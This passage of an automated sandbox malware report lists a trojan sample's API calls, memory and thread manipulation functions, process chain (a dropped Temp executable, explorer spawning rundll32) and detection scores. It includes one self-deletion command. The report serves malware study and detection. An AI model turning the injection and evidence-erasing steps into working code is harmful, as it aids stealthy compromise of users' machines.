          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BAB406_2_044BAB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B6BD76_2_044B6BD7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043F14606_2_043F1460
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BF43F6_2_044BF43F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B75716_2_044B7571
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044C95C36_2_044C95C3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0449D5B06_2_0449D5B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044456306_2_04445630
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B16CC6_2_044B16CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BF7B06_2_044BF7B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044070C06_2_044070C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044AF0CC6_2_044AF0CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B70E96_2_044B70E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BF0E06_2_044BF0E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044CB16B6_2_044CB16B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0443516C6_2_0443516C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043EF1726_2_043EF172
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0440B1B06_2_0440B1B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0441B2C06_2_0441B2C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044A12ED6_2_044A12ED
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044052A06_2_044052A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B132D6_2_044B132D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043ED34C6_2_043ED34C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0444739A6_2_0444739A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04479C326_2_04479C32
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BFCF26_2_044BFCF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04403D406_2_04403D40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B1D5A6_2_044B1D5A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B7D736_2_044B7D73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0441FDC06_2_0441FDC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04409EB06_2_04409EB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BFF096_2_044BFF09
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04401F926_2_04401F92
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BFFB16_2_044BFFB1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0446D8006_2_0446D800
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044038E06_2_044038E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044099506_2_04409950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0441B9506_2_0441B950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044959106_2_04495910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BFA496_2_044BFA49
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B7A466_2_044B7A46
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04473A6C6_2_04473A6C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044ADAC66_2_044ADAC6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04445AA06_2_04445AA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0449DAAC6_2_0449DAAC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044A1AA36_2_044A1AA3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BFB766_2_044BFB76
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04475BF06_2_04475BF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0443DBF96_2_0443DBF9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0441FB806_2_0441FB80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013ED3D6_2_0013ED3D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00122D906_2_00122D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00122FB06_2_00122FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00129E506_2_00129E50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00129E4C6_2_00129E4C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 043EB970 appears 277 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0447F290 appears 105 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04447E54 appears 111 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04435130 appears 58 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0446EA12 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: String function: 001BCC67 appears 34 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: String function: 0163EA12 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: String function: 001B68AE appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: String function: 0164F290 appears 105 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: String function: 015BB970 appears 277 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: String function: 001B0BE0 appears 102 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: String function: 01617E54 appears 111 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: String function: 01605130 appears 58 times
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A350 NtCreateFile,4_2_0041A350
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A400 NtReadFile,4_2_0041A400
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A480 NtClose,4_2_0041A480
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A530 NtAllocateVirtualMemory,4_2_0041A530
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A34B NtCreateFile,4_2_0041A34B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A3FA NtReadFile,4_2_0041A3FA
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A3A2 NtCreateFile,NtReadFile,4_2_0041A3A2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A47F NtClose,4_2_0041A47F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041A52A NtAllocateVirtualMemory,4_2_0041A52A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602B60 NtClose,LdrInitializeThunk,4_2_01602B60
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_01602BF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602AD0 NtReadFile,LdrInitializeThunk,4_2_01602AD0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_01602D30
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602D10 NtMapViewOfSection,LdrInitializeThunk,4_2_01602D10
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01602DF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602DD0 NtDelayExecution,LdrInitializeThunk,4_2_01602DD0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01602C70
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_01602CA0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602F30 NtCreateSection,LdrInitializeThunk,4_2_01602F30
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602FE0 NtCreateFile,LdrInitializeThunk,4_2_01602FE0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602FB0 NtResumeThread,LdrInitializeThunk,4_2_01602FB0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602F90 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01602F90
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01602EA0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_01602E80
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01604340 NtSetContextThread,4_2_01604340
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01604650 NtSuspendThread,4_2_01604650
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602BE0 NtQueryValueKey,4_2_01602BE0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602BA0 NtEnumerateValueKey,4_2_01602BA0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602B80 NtQueryInformationFile,4_2_01602B80
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602AF0 NtWriteFile,4_2_01602AF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602AB0 NtWaitForSingleObject,4_2_01602AB0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602D00 NtSetInformationFile,4_2_01602D00
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602DB0 NtEnumerateKey,4_2_01602DB0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602C60 NtCreateKey,4_2_01602C60
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602C00 NtQueryInformationProcess,4_2_01602C00
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602CF0 NtOpenProcess,4_2_01602CF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602CC0 NtQueryVirtualMemory,4_2_01602CC0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602F60 NtCreateProcessEx,4_2_01602F60
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602FA0 NtQuerySection,4_2_01602FA0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602E30 NtWriteVirtualMemory,4_2_01602E30
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602EE0 NtQueueApcThread,4_2_01602EE0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01603010 NtOpenDirectoryObject,4_2_01603010
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01603090 NtSetValueKey,4_2_01603090
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016035C0 NtCreateMutant,4_2_016035C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016039B0 NtGetContextThread,4_2_016039B0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01603D70 NtOpenThread,4_2_01603D70
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01603D10 NtOpenProcessToken,4_2_01603D10
          Source: C:\Windows\explorer.exeCode function: 5_2_10B4F232 NtCreateFile,5_2_10B4F232
          Source: C:\Windows\explorer.exeCode function: 5_2_10B50E12 NtProtectVirtualMemory,5_2_10B50E12
          Source: C:\Windows\explorer.exeCode function: 5_2_10B50E0A NtProtectVirtualMemory,5_2_10B50E0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432C60 NtCreateKey,LdrInitializeThunk,6_2_04432C60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04432C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04432CA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04432D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432DD0 NtDelayExecution,LdrInitializeThunk,6_2_04432DD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04432DF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04432EA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432F30 NtCreateSection,LdrInitializeThunk,6_2_04432F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432FE0 NtCreateFile,LdrInitializeThunk,6_2_04432FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432AD0 NtReadFile,LdrInitializeThunk,6_2_04432AD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432B60 NtClose,LdrInitializeThunk,6_2_04432B60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04432BE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04432BF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044335C0 NtCreateMutant,LdrInitializeThunk,6_2_044335C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04434650 NtSuspendThread,6_2_04434650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04434340 NtSetContextThread,6_2_04434340
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432C00 NtQueryInformationProcess,6_2_04432C00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432CC0 NtQueryVirtualMemory,6_2_04432CC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432CF0 NtOpenProcess,6_2_04432CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432D00 NtSetInformationFile,6_2_04432D00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432D30 NtUnmapViewOfSection,6_2_04432D30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432DB0 NtEnumerateKey,6_2_04432DB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432E30 NtWriteVirtualMemory,6_2_04432E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432EE0 NtQueueApcThread,6_2_04432EE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432E80 NtReadVirtualMemory,6_2_04432E80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432F60 NtCreateProcessEx,6_2_04432F60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432F90 NtProtectVirtualMemory,6_2_04432F90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432FA0 NtQuerySection,6_2_04432FA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432FB0 NtResumeThread,6_2_04432FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432AF0 NtWriteFile,6_2_04432AF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432AB0 NtWaitForSingleObject,6_2_04432AB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432B80 NtQueryInformationFile,6_2_04432B80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04432BA0 NtEnumerateValueKey,6_2_04432BA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04433010 NtOpenDirectoryObject,6_2_04433010
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04433090 NtSetValueKey,6_2_04433090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04433D70 NtOpenThread,6_2_04433D70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04433D10 NtOpenProcessToken,6_2_04433D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044339B0 NtGetContextThread,6_2_044339B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A350 NtCreateFile,6_2_0013A350
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A400 NtReadFile,6_2_0013A400
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A480 NtClose,6_2_0013A480
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A530 NtAllocateVirtualMemory,6_2_0013A530
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A34B NtCreateFile,6_2_0013A34B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A3A2 NtCreateFile,NtReadFile,6_2_0013A3A2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A3FA NtReadFile,6_2_0013A3FA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A47F NtClose,6_2_0013A47F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013A52A NtAllocateVirtualMemory,6_2_0013A52A
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeSection loaded: icuuc.dllJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeSection loaded: icuin.dllJump to behavior
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xheuzyg.exe B5D248548FAEDE30D47AA97B068B3BD63D39EA0C69D965FEE54AD1ACCF51495B
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeReversingLabs: Detection: 57%
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeVirustotal: Detection: 65%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeJump to behavior
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe "C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe C:\Users\user~1\AppData\Local\Temp\xheuzyg.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\LocalCache\RNManualFileCacheJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsl91E7.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/3@12/8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: __d(function(e,o,r,a){var n,t=o(292),i=t.NativeModules,s=(t.Platform,i.RNCookieManagerIOS,i.RNCookieManagerAndroid,i.RNCookieManagerWindows);o(1816)(s,"Add a reference to RNCookieManager.csproj in your project"),n=s;var l=["set","setFromResponse","get","getAll","clearAll"];r.exports={};for(var d=0;d<l.length;d++)r.exports[l[d]]=n[l[d]]},1815);
          Source: Binary string: wntdll.pdbUGP source: xheuzyg.exe, 00000002.00000003.1228223743.000000001DE10000.00000004.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000002.00000003.1227185095.000000001DFB0000.00000004.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.000000000172E000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1231900300.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1229286963.0000000001234000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1289145388.0000000004218000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1286865129.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: xheuzyg.exe, xheuzyg.exe, 00000004.00000002.1286241915.000000000172E000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1231900300.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1229286963.0000000001234000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000006.00000003.1289145388.0000000004218000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1286865129.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: xheuzyg.exe, 00000004.00000002.1286179428.0000000001550000.00000040.10000000.00040000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1285918068.0000000001138000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3709614630.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: xheuzyg.exe, 00000004.00000002.1286179428.0000000001550000.00000040.10000000.00040000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1285918068.0000000001138000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3709614630.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B0C26 push ecx; ret 2_2_001B0C39
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B06C9 push ecx; ret 2_2_001B06DC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001C972C push eax; ret 2_2_001C974A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B0C26 push ecx; ret 4_2_001B0C39
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B06C9 push ecx; ret 4_2_001B06DC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001C972C push eax; ret 4_2_001C974A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00416839 push edi; retf 4_2_0041683B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041EA4F push edx; ret 4_2_0041EA51
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00417A78 pushfd ; iretd 4_2_00417A81
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041EABD pushfd ; retn 0000h4_2_0041EAC7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041D4F2 push eax; ret 4_2_0041D4F8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041D4FB push eax; ret 4_2_0041D562
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041D4A5 push eax; ret 4_2_0041D4F8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041D55C push eax; ret 4_2_0041D562
